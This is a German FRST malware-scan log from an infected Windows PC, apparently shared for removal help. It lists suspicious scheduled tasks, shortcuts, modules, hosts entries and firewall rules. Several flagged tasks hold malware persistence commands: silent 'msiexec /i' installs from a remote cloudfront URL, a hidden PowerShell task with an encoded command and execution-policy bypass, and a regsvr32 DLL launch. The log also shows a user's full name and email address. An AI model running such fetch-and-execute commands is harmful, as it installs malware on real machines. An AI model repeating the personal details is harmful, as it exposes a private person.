Task: {2E2640BC-9462-4C5F-90BD-892338D59DF4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () <==== ACHTUNG
Task: {49A10F24-190A-4ED7-9B48-C3CB6BBBC914} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {53A67BD4-6351-4805-A436-9353CBFAAAFA} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wiiu02015@outlook.de => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe 
Task: {6557BCB6-2F27-448C-ACA4-7E86E4B009E5} - System32\Tasks\Update => C:\Users\Nick 
Task: {673824BA-7A3C-41BF-A4DA-9C4F9887830A} - System32\Tasks\Red Giant Link => C:\Program Files\Red Giant Link\Red Giant Link.exe 
Task: {6AFC3B2B-BD1E-4624-B0FF-60E210D98357} - \task Update -> Keine Datei <==== ACHTUNG
Task: {72FEC8A9-7468-4164-9720-A650AB414362} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe  <==== ACHTUNG
Task: {74DECB46-8172-4D8D-A795-B4201324F918} - System32\Tasks\Qizsywosale Core => C:\Program Files (x86)\Fepuly\xruvudom.exe 
Task: {7DF225F2-E9BE-467E-BBE5-6136CE240342} - System32\Tasks\Quick Tharks Screen Saver => Rundll32.exe "C:\Program Files\Quick Tharks Screen Saver\Quick Tharks Screen Saver.dll",eJRVBzCDxduB
Task: {9376D540-EE5F-4016-8595-273CB525CC42} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2017-05-23] (Microsoft Corporation)
Task: {9BC09D15-0FE3-42E6-917C-A7AEE41F44B8} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;d=20170418 /q <==== ACHTUNG
Task: {9C8653D0-0863-4F6C-BDC9-E813956ACA92} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe 
Task: {A885A6AF-A8B5-484C-9416-15C01E02D67D} - System32\Tasks\fyKiuMkkXh => C:\Program Files (x86)\XIOLoa7MyU\updengine.exe  <==== ACHTUNG
Task: {B109EF88-6721-40A7-B261-9D175E298958} - System32\Tasks\Coobeck Monitor => C:\Program Files (x86)\Arucerther\yaupdcache.exe 
Task: {B76D98BF-21F4-4F78-A43A-95F8B72AD43D} - System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAIAAgADsAOwA7ACAAIAAgADsAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA (Der Dateneintrag hat 9580 mehr Zeichen). <==== ACHTUNG
Task: {B8732800-4537-42E1-8E92-0D38D2678C49} - System32\Tasks\OneDrive Standalone Update Task v2 => C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe [2017-05-13] ()
Task: {D18984F6-6A81-40A8-A7A5-020084C99227} - System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\575f1242\3bf5ca72.dll" <==== ACHTUNG
Task: {D4BAA7ED-86EB-4B60-9F30-8E2D64B7D175} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {D66B17AC-FEAC-46B3-A7DF-3865C135032C} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe [2017-05-26] ()
Task: {D74DB4BE-DE57-43E2-97AF-575D2663AEE8} - System32\Tasks\Perkeentgreserk => msiexec.exe /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;v=20170316 /q <==== ACHTUNG
Task: {DBE77801-9F7F-4CE7-9DE2-FDB39098637C} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_171_pepper.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {E6C4E4E8-090E-49DF-8E3F-70FC88E8E56F} - System32\Tasks\{25FE2E5B-9255-99F0-1368-8A42E54326C9} => C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}\63E4E652-D44F-51F9-5689-B0A4B2295152.exe [2017-06-02] () <==== ACHTUNG
Task: {EC667399-8041-43FD-BACE-C95F53D20EC6} - System32\Tasks\SoftUpgrade => C:\Program Files (x86)\SoftUpgrade\softup.exe [2017-05-29] () <==== ACHTUNG
Task: {F51F669D-34D8-49E3-9371-1DA093A90419} - System32\Tasks\Gerfety Renew => C:\Program Files (x86)\Prfasaretaly\yaupdcache.exe [2017-05-29] ()
Task: {F6691563-4A82-4630-97F5-2AD5B410283B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verkn黳fungen =============================

(Die Eintr鋑e k鰊nen gelistet werden, um sie zur點kzusetzen oder zu entfernen.)

WMI_ActiveScriptEventConsumer_ASEC: <===== ACHTUNG

Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d6731079c9ca4513\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\CyberLyric - Chrome.lnk -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e ()
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\8e5c0db72600a899\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\82c1ad0bea96409d\CyberLyric - Chrome.lnk -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\82c1ad0bea96409d ()
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\CyberLyric - Chrome.lnk -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9 ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-08-21 10:29 - 2016-08-21 10:29 - 00594944 _____ () C:\Program Files\EqualizerAPO\EqualizerAPO.dll
2015-11-22 22:05 - 2015-11-22 22:05 - 01530880 _____ () C:\Program Files\EqualizerAPO\libsndfile-1.dll
2014-03-15 23:29 - 2014-03-15 23:29 - 02604934 _____ () C:\Program Files\EqualizerAPO\libfftw3f-3.dll
2017-03-17 00:03 - 2017-03-17 00:03 - 00306688 _____ () C:\Program Files (x86)\Qizsywosale Core\local64spl.dll
2017-05-29 22:00 - 2015-06-01 01:57 - 02445824 _____ () C:\Program Files\Quick Tharks Screen Saver\Quick Tharks Screen Saver.dll
2017-02-27 11:37 - 2016-02-04 12:53 - 00387144 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2015-08-09 05:50 - 2016-10-07 00:07 - 00393208 _____ () C:\Windows\system32\igfxTray.exe
2017-06-01 00:15 - 2017-01-03 13:20 - 01052256 _____ () C:\ProgramData\windows\windows.exe
2017-06-05 10:09 - 2017-06-05 10:09 - 00307200 _____ () C:\Windows\TEMP\gB39B.tmp.exe
2017-06-05 10:09 - 2017-06-05 10:09 - 00478208 _____ () C:\Windows\TEMP\gB40B.tmp.exe
2017-05-31 13:52 - 2017-05-31 07:18 - 00101528 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2017-05-08 16:50 - 2017-06-01 12:00 - 01886720 _____ () c:\users\nick schuster\appdata\roaming\winsapsvc\winsap.dll
2017-03-28 19:38 - 2017-03-28 04:48 - 00105984 _____ () c:\programdata\package cache\{2a002f88-fd5d-379b-a350-a25d84af128b}v14.0.25420\packages\visualc_d14\vc_ide.base\vc_ide_base.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verkn黳fungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt.)

HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\regfile: regedit.exe "%1" <===== ACHTUNG

==================== Internet Explorer Vertrauensw黵dig/Eingeschr鋘kt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ==========================

(Wenn ben鰐igt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zur點kzusetzen.)

2016-11-23 18:06 - 2017-05-30 13:55 - 00013624 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 rad.msn.com
127.0.0.1 live.rads.msn.com
127.0.0.1 ads1.msn.com
127.0.0.1 g.msn.com
127.0.0.1 a.ads2.msads.net
127.0.0.1 b.ads2.msads.net
127.0.0.1 ac3.msn.com
127.0.0.1 apps.skype.com
127.0.0.1 clients2.google.com 
127.0.0.1 v1.ff.avast.com 
127.0.0.1 vlcproxy.ff.avast.com 
127.0.0.1 wemsofts.com
127.0.0.1 bongadoom.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 internalcampaigntargets.com
127.0.0.1 bongadoom.com
127.0.0.1 getthefilenow.com
127.0.0.1 bigpicturepop.com
127.0.0.1 wizzcaster.com
127.0.0.1 bestoffersfortoday.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 agent.wizztrakys.com
127.0.0.1 csdimonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 titiaredh.com
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com

Da befinden sich 364 zus鋞zliche Eintr鋑e.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix f黵 diesen Bereich.)

HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows Photo Viewer\Hintergrundbild der Windows-Fotoanzeige.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Eintr鋑e ==

MSCONFIG\Services: AppleAppSvc => 2
MSCONFIG\Services: AppleCloudSvc => 2
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: DbxSvc => 2
MSCONFIG\Services: KingoSoftService => 2
MSCONFIG\Services: Kitty => 2
MSCONFIG\Services: pgt_svc => 2
MSCONFIG\Services: Recover => 2
MSCONFIG\Services: srcsrv => 2
MSCONFIG\Services: SysLinkMapper => 2
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "vnlgp"
HKLM\...\StartupApproved\Run: => "AirServer64"
HKLM\...\StartupApproved\Run: => "gplyra"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "KMS"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "KiesTrayAgent"
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\StartupFolder: => "smss.exe"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "HKOEGBGL4X"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "tsiVideo"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spiele Post"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "6CC2RLD170"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Google Updater 2.0"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{22AB143C-8D2D-4A97-8DD0-BA531B1CC8C0}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [UDP Query User{96E2CDFB-4366-4001-B896-915F472C33C7}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [TCP Query User{08BD94A2-3AB2-4176-BFA3-6ECD3237AF6A}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{A093A1CB-FFE2-41F2-8755-748DAFCA91D3}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{B8EFB49A-616F-4DCE-8DAB-00382F0142DB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{26CEF901-32C1-48FD-B121-1CCDA0B2B727}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{9093F9AF-59BF-4438-901B-55A2BCA47AAF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E3F33213-2D1F-451B-8111-0C2145F24BB2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{86241E34-E8BA-4BC3-85B5-7A1BF84E7249}C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe
FirewallRules: [UDP Query User{BB112180-BAC4-4667-A338-483250E2DDE3}C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe
FirewallRules: [{67FE29D8-F9EC-4911-A8FD-4DA5EB1CC57E}] => (Allow) C:\Users\Nick Schuster\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{73E1D05C-E37A-49D0-9EEF-3F095697DF28}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D8F57116-C8F8-4A7A-A754-306A6CA0C90D}] => (Allow) LPort=2869
FirewallRules: [{F66DF897-E8A8-4CB8-9052-E1FB7F5C4AD5}] => (Allow) LPort=1900
FirewallRules: [{73EDF2AF-E150-4E83-AF4F-A1F19E84F9EC}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{DE14579F-7B4B-4280-BB0A-C30A54A3B6C6}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [UDP Query User{5135D920-7EB9-48CC-98A9-F97B5A6315D1}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [TCP Query User{000568FB-833E-4074-9BF9-E65421169028}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [UDP Query User{D8AEB9CF-BCEE-48A1-B5F2-D15985DE2D8C}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [{B700AFED-8A4C-4D2B-9531-88AE1F0961DF}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe
FirewallRules: [{A9CEE88F-19AC-40D4-B1E0-1CE9ADA40CEA}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe
FirewallRules: [TCP Query User{15F9F589-2E16-488F-A735-46B4687E0A25}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{9E9FDBC5-6384-4D1D-810B-ABAC18CAE71E}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{185173E7-A203-4A22-A422-CE964D957E81}C:\program files\java\jre1.8.0_101\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [UDP Query User{494306F8-0AFD-4162-84F4-20CC75C86288}C:\program files\java\jre1.8.0_101\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [TCP Query User{A5A5FDEC-CF06-4BD4-B0A0-6BC84A789F7B}C:\users\nick schuster\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\nick schuster\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{0864A6DE-1108-42B0-8EED-DAFDE57300E2}C:\users\nick schuster\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\nick schuster\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{0FCE7EA3-D45A-4939-9F66-5519BC75F92C}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [UDP Query User{FD3E8EB7-E26C-4BCC-A156-9B91C355B3E7}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [TCP Query User{EDE1FD40-AA4B-4EF0-959C-F8CE1A605D15}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [UDP Query User{62B95D88-E6FA-4DA3-A731-F12CE4454A71}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [TCP Query User{1219B3DD-72AC-4318-BDB6-10CC2D867F71}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{E532A6F6-9983-4D4B-AD87-FB0154588B9A}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{B9299B44-1342-40FC-AF31-121EAEEA8CE6}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{EA9B50E4-1481-469A-9A3B-7B29917064B6}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{A836AADE-AAF1-490E-A824-2379A923DEA2}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [UDP Query User{A327B216-10EA-4777-81F3-F7E411B925C3}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [{08CB5F11-70F8-4D75-A111-4E1E8BBD9E3E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{8A58A32F-5A08-4A6A-82A7-884402B2A3A9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{440E6BBA-8081-42E8-A3EB-227467E44FF0}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [UDP Query User{192F493E-9BEA-4B3F-A07E-DC925E5A956B}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [{55D8B042-B4DB-4BDC-8388-40CAEE3B6280}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [TCP Query User{1E2DE2A6-4A6F-48DD-AFFF-3754FB938712}C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [UDP Query User{1B711A47-FC46-4A43-A47B-D50E933AE73E}C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [TCP Query User{CCD12204-D344-4471-89B4-CE5D09ED25A3}C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [UDP Query User{4090B209-49DE-4A00-AA22-61541F35DA1C}C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [TCP Query User{D708F925-06D9-4256-8202-3F4762014482}C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe
FirewallRules: [UDP Query User{3D9EDEFE-8940-4B66-B4F2-C7CE32744C78}C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe
FirewallRules: [{64204D1E-A55F-44F5-8FA5-1E01527D722E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{32F7B5EA-0ECA-4D23-9F23-07379BEA381C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{4FF95AC7-EC5D-4600-AD0D-055FF8D32293}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{16730D0F-F55B-4954-BE21-012786AF645E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{FF757347-BB96-48C2-895D-3245201BDF29}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{418F7263-9144-4F6E-89C2-567F4FC4D4B2}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{CC6C422C-F23C-43E9-849F-AB743F6EF50D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{398F9BD3-E78B-48BB-BA1E-1D07F750B4B8}C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe] => (Block) C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe
FirewallRules: [UDP Query User{80B3AFDD-761C-4E3D-961B-D5DEEB7D4037}C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe] => (Block) C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe
FirewallRules: [TCP Query User{BCF4E2CA-404F-42B4-B15A-1DC01A91FCD1}C:\program files (x86)\secondlifeviewer\slvoice.exe] => (Allow) C:\program files (x86)\secondlifeviewer\slvoice.exe
FirewallRules: [UDP Query User{FB5E0AAD-BEBA-4E6E-9548-7D5B5611E704}C:\program files (x86)\secondlifeviewer\slvoice.exe] => (Allow) C:\program files (x86)\secondlifeviewer\slvoice.exe
FirewallRules: [TCP Query User{8BA8D722-6016-406D-9E15-195324DC63A8}C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe] => (Block) C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [UDP Query User{7F51C867-76EE-4250-8CF3-7B7EFE720FB8}C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe] => (Block) C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [{2B3F7CC6-59B7-4284-858C-F526FDA6E80E}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{6E1A0C9B-71D6-4408-A801-184E33CF6F48}] => (Allow) C:\Users\Nick Schuster\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{A1305C14-D2A3-49FB-B1C5-84DBD2C016EE}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{41BE6AEB-1FB9-4FE8-9A33-6BE94F8777CD}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{00EC57C6-545A-4619-AAD9-ABD42ECD7175}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6293536B-CA56-4567-8598-4712417A6B4D}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9DF35FDD-92CF-4145-BDB7-D5B71F698ADF}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
